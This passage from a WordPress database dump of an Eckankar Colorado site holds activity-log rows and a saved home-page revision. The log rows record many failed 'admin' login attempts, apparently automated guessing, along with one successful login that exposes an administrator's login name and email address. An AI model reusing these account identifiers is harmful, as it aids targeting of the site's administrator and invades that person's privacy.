Chrome/88.0.4240.193 Safari/537.36'),(233252,39586,'_message_key','user_unknown_login_failed'),(233253,39586,'_server_remote_addr','57.128.65.x'),(233254,39586,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233255,39587,'failed_username','individualise'),(233256,39587,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233257,39587,'_message_key','user_unknown_login_failed'),(233258,39587,'_server_remote_addr','57.128.65.x'),(233259,39587,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233260,39588,'failed_username','individualise'),(233261,39588,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233262,39588,'_message_key','user_unknown_login_failed'),(233263,39588,'_server_remote_addr','57.128.65.x'),(233264,39588,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233265,39589,'failed_username','individualise'),(233266,39589,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233267,39589,'_message_key','user_unknown_login_failed'),(233268,39589,'_server_remote_addr','57.128.65.x'),(233269,39589,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233270,39590,'failed_username','individualise'),(233271,39590,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233272,39590,'_message_key','user_unknown_login_failed'),(233273,39590,'_server_remote_addr','57.128.65.x'),(233274,39590,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233275,39591,'failed_username','individualise'),(233276,39591,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233277,39591,'_message_key','user_unknown_login_failed'),(233278,39591,'_server_remote_addr','57.128.65.x'),(233279,39591,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233280,39592,'failed_username','individualise'),(233281,39592,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233282,39592,'_message_key','user_unknown_login_failed'),(233283,39592,'_server_remote_addr','57.128.65.x'),(233284,39592,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233285,39593,'failed_username','individualise'),(233286,39593,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233287,39593,'_message_key','user_unknown_login_failed'),(233288,39593,'_server_remote_addr','57.128.65.x'),(233289,39593,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233290,39594,'failed_username','individualise'),(233291,39594,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233292,39594,'_message_key','user_unknown_login_failed'),(233293,39594,'_server_remote_addr','57.128.65.x'),(233294,39594,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233295,39595,'failed_username','individualise'),(233296,39595,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233297,39595,'_message_key','user_unknown_login_failed'),(233298,39595,'_server_remote_addr','57.128.65.x'),(233299,39595,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233300,39596,'failed_username','admin'),(233301,39596,'server_http_user_agent','Mozilla/5.0'),(233302,39596,'_message_key','user_unknown_login_failed'),(233303,39596,'_server_remote_addr','20.38.42.x'),(233304,39597,'failed_username','admin'),(233305,39597,'server_http_user_agent','Mozilla/5.0'),(233306,39597,'_message_key','user_unknown_login_failed'),(233307,39597,'_server_remote_addr','20.38.42.x'),(233308,39598,'failed_username','admin'),(233309,39598,'server_http_user_agent','Mozilla/5.0'),(233310,39598,'_message_key','user_unknown_login_failed'),(233311,39598,'_server_remote_addr','20.38.42.x'),(233312,39599,'failed_username','admin'),(233313,39599,'server_http_user_agent','Mozilla/5.0'),(233314,39599,'_message_key','user_unknown_login_failed'),(233315,39599,'_server_remote_addr','104.225.143.x'),(233316,39600,'failed_username','admin'),(233317,39600,'server_http_user_agent','Mozilla/5.0'),(233318,39600,'_message_key','user_unknown_login_failed'),(233319,39600,'_server_remote_addr','20.38.42.x'),(233320,39601,'failed_username','admin'),(233321,39601,'server_http_user_agent','Mozilla/5.0'),(233322,39601,'_message_key','user_unknown_login_failed'),(233323,39601,'_server_remote_addr','20.38.42.x'),(233324,39602,'failed_username','admin'),(233325,39602,'server_http_user_agent','Mozilla/5.0'),(233326,39602,'_message_key','user_unknown_login_failed'),(233327,39602,'_server_remote_addr','20.38.42.x'),(233328,39603,'failed_username','admin'),(233329,39603,'server_http_user_agent','Mozilla/5.0'),(233330,39603,'_message_key','user_unknown_login_failed'),(233331,39603,'_server_remote_addr','104.225.143.x'),(233332,39604,'failed_username','admin'),(233333,39604,'server_http_user_agent','Mozilla/5.0'),(233334,39604,'_message_key','user_unknown_login_failed'),(233335,39604,'_server_remote_addr','20.38.42.x'),(233336,39605,'failed_username','admin'),(233337,39605,'server_http_user_agent','Mozilla/5.0'),(233338,39605,'_message_key','user_unknown_login_failed'),(233339,39605,'_server_remote_addr','20.38.42.x'),(233340,39606,'failed_username','admin'),(233341,39606,'server_http_user_agent','Mozilla/5.0'),(233342,39606,'_message_key','user_unknown_login_failed'),(233343,39606,'_server_remote_addr','20.38.42.x'),(233344,39607,'failed_username','admin'),(233345,39607,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(233346,39607,'_message_key','user_unknown_login_failed'),(233347,39607,'_server_remote_addr','104.244.79.x'),(233348,39608,'failed_username','admin'),(233349,39608,'server_http_user_agent','Mozilla/5.0'),(233350,39608,'_message_key','user_unknown_login_failed'),(233351,39608,'_server_remote_addr','104.225.143.x'),(233352,39609,'failed_username','admin'),(233353,39609,'server_http_user_agent','Mozilla/5.0'),(233354,39609,'_message_key','user_unknown_login_failed'),(233355,39609,'_server_remote_addr','20.38.42.x'),(233356,39610,'failed_username','admin'),(233357,39610,'server_http_user_agent','Mozilla/5.0'),(233358,39610,'_message_key','user_unknown_login_failed'),(233359,39610,'_server_remote_addr','20.38.42.x'),(233360,39611,'failed_username','admin'),(233361,39611,'server_http_user_agent','Mozilla/5.0'),(233362,39611,'_message_key','user_unknown_login_failed'),(233363,39611,'_server_remote_addr','20.38.42.x'),(233364,39612,'failed_username','admin'),(233365,39612,'server_http_user_agent','Mozilla/5.0'),(233366,39612,'_message_key','user_unknown_login_failed'),(233367,39612,'_server_remote_addr','20.38.42.x'),(233368,39613,'failed_username','admin'),(233369,39613,'server_http_user_agent','Mozilla/5.0'),(233370,39613,'_message_key','user_unknown_login_failed'),(233371,39613,'_server_remote_addr','104.225.143.x'),(233372,39614,'failed_username','admin'),(233373,39614,'server_http_user_agent','Mozilla/5.0'),(233374,39614,'_message_key','user_unknown_login_failed'),(233375,39614,'_server_remote_addr','20.38.42.x'),(233376,39615,'failed_username','admin'),(233377,39615,'server_http_user_agent','Mozilla/5.0'),(233378,39615,'_message_key','user_unknown_login_failed'),(233379,39615,'_server_remote_addr','20.38.42.x'),(233380,39616,'failed_username','admin'),(233381,39616,'server_http_user_agent','Mozilla/5.0'),(233382,39616,'_message_key','user_unknown_login_failed'),(233383,39616,'_server_remote_addr','20.38.42.x'),(233384,39617,'failed_username','admin'),(233385,39617,'server_http_user_agent','Mozilla/5.0'),(233386,39617,'_message_key','user_unknown_login_failed'),(233387,39617,'_server_remote_addr','104.225.143.x'),(233388,39618,'failed_username','admin'),(233389,39618,'server_http_user_agent','Mozilla/5.0'),(233390,39618,'_message_key','user_unknown_login_failed'),(233391,39618,'_server_remote_addr','20.38.42.x'),(233392,39619,'failed_username','admin'),(233393,39619,'server_http_user_agent','Mozilla/5.0'),(233394,39619,'_message_key','user_unknown_login_failed'),(233395,39619,'_server_remote_addr','20.38.42.x'),(233396,39620,'failed_username','admin'),(233397,39620,'server_http_user_agent','Mozilla/5.0'),(233398,39620,'_message_key','user_unknown_login_failed'),(233399,39620,'_server_remote_addr','20.38.42.x'),(233400,39621,'failed_username','admin'),(233401,39621,'server_http_user_agent','Mozilla/5.0'),(233402,39621,'_message_key','user_unknown_login_failed'),(233403,39621,'_server_remote_addr','20.38.42.x'),(233404,39622,'failed_username','admin'),(233405,39622,'server_http_user_agent','Mozilla/5.0'),(233406,39622,'_message_key','user_unknown_login_failed'),(233407,39622,'_server_remote_addr','104.225.143.x'),(233408,39623,'failed_username','admin'),(233409,39623,'server_http_user_agent','Mozilla/5.0'),(233410,39623,'_message_key','user_unknown_login_failed'),(233411,39623,'_server_remote_addr','20.38.42.x'),(233412,39624,'failed_username','admin'),(233413,39624,'server_http_user_agent','Mozilla/5.0'),(233414,39624,'_message_key','user_unknown_login_failed'),(233415,39624,'_server_remote_addr','20.38.42.x'),(233416,39625,'failed_username','admin'),(233417,39625,'server_http_user_agent','Mozilla/5.0'),(233418,39625,'_message_key','user_unknown_login_failed'),(233419,39625,'_server_remote_addr','20.38.42.x'),(233420,39626,'failed_username','admin'),(233421,39626,'server_http_user_agent','Mozilla/5.0'),(233422,39626,'_message_key','user_unknown_login_failed'),(233423,39626,'_server_remote_addr','104.225.143.x'),(233424,39627,'failed_username','admin'),(233425,39627,'server_http_user_agent','Mozilla/5.0'),(233426,39627,'_message_key','user_unknown_login_failed'),(233427,39627,'_server_remote_addr','20.38.42.x'),(233428,39628,'failed_username','admin'),(233429,39628,'server_http_user_agent','Mozilla/5.0'),(233430,39628,'_message_key','user_unknown_login_failed'),(233431,39628,'_server_remote_addr','20.38.42.x'),(233432,39629,'failed_username','admin'),(233433,39629,'server_http_user_agent','Mozilla/5.0'),(233434,39629,'_message_key','user_unknown_login_failed'),(233435,39629,'_server_remote_addr','20.38.42.x'),(233436,39630,'failed_username','admin'),(233437,39630,'server_http_user_agent','Mozilla/5.0'),(233438,39630,'_message_key','user_unknown_login_failed'),(233439,39630,'_server_remote_addr','20.38.42.x'),(233440,39631,'failed_username','admin'),(233441,39631,'server_http_user_agent','Mozilla/5.0'),(233442,39631,'_message_key','user_unknown_login_failed'),(233443,39631,'_server_remote_addr','20.38.42.x'),(233444,39632,'failed_username','admin'),(233445,39632,'server_http_user_agent','Mozilla/5.0'),(233446,39632,'_message_key','user_unknown_login_failed'),(233447,39632,'_server_remote_addr','20.38.42.x'),(233448,39633,'failed_username','admin'),(233449,39633,'server_http_user_agent','Mozilla/5.0'),(233450,39633,'_message_key','user_unknown_login_failed'),(233451,39633,'_server_remote_addr','20.38.42.x'),(233452,39634,'failed_username','admin'),(233453,39634,'server_http_user_agent','Mozilla/5.0'),(233454,39634,'_message_key','user_unknown_login_failed'),(233455,39634,'_server_remote_addr','20.38.42.x'),(233456,39635,'failed_username','admin'),(233457,39635,'server_http_user_agent','Mozilla/5.0'),(233458,39635,'_message_key','user_unknown_login_failed'),(233459,39635,'_server_remote_addr','20.38.42.x'),(233460,39636,'failed_username','admin'),(233461,39636,'server_http_user_agent','Mozilla/5.0'),(233462,39636,'_message_key','user_unknown_login_failed'),(233463,39636,'_server_remote_addr','20.38.42.x'),(233464,39637,'failed_username','admin'),(233465,39637,'server_http_user_agent','Mozilla/5.0'),(233466,39637,'_message_key','user_unknown_login_failed'),(233467,39637,'_server_remote_addr','20.38.42.x'),(233468,39638,'failed_username','admin'),(233469,39638,'server_http_user_agent','Mozilla/5.0'),(233470,39638,'_message_key','user_unknown_login_failed'),(233471,39638,'_server_remote_addr','20.38.42.x'),(233472,39639,'failed_username','admin'),(233473,39639,'server_http_user_agent','Mozilla/5.0'),(233474,39639,'_message_key','user_unknown_login_failed'),(233475,39639,'_server_remote_addr','20.38.42.x'),(233476,39640,'failed_username','admin'),(233477,39640,'server_http_user_agent','Mozilla/5.0'),(233478,39640,'_message_key','user_unknown_login_failed'),(233479,39640,'_server_remote_addr','20.38.42.x'),(233480,39641,'failed_username','admin'),(233481,39641,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(233482,39641,'_message_key','user_unknown_login_failed'),(233483,39641,'_server_remote_addr','104.244.74.x'),(233484,39642,'failed_username','admin'),(233485,39642,'server_http_user_agent','Mozilla/5.0'),(233486,39642,'_message_key','user_unknown_login_failed'),(233487,39642,'_server_remote_addr','20.38.42.x'),(233488,39643,'failed_username','admin'),(233489,39643,'server_http_user_agent','Mozilla/5.0'),(233490,39643,'_message_key','user_unknown_login_failed'),(233491,39643,'_server_remote_addr','20.38.42.x'),(233492,39644,'user_id','2'),(233493,39644,'user_email','nada@zipnadanot.org'),(233494,39644,'user_login','S8zhaBda'),(233495,39644,'_user_id','2'),(233496,39644,'_user_login','S8zhaBda'),(233497,39644,'_user_email','nada@zipnadanot.org'),(233498,39644,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(233499,39644,'_message_key','user_logged_in'),(233500,39644,'_server_remote_addr','76.130.120.x'),(233501,39644,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(233502,39645,'failed_username','admin'),(233503,39645,'server_http_user_agent','Mozilla/5.0'),(233504,39645,'_message_key','user_unknown_login_failed'),(233505,39645,'_server_remote_addr','20.38.42.x'),(233506,39646,'post_id','7160'),(233507,39646,'post_type','page'),(233508,39646,'post_title','Home'),(233509,39646,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; 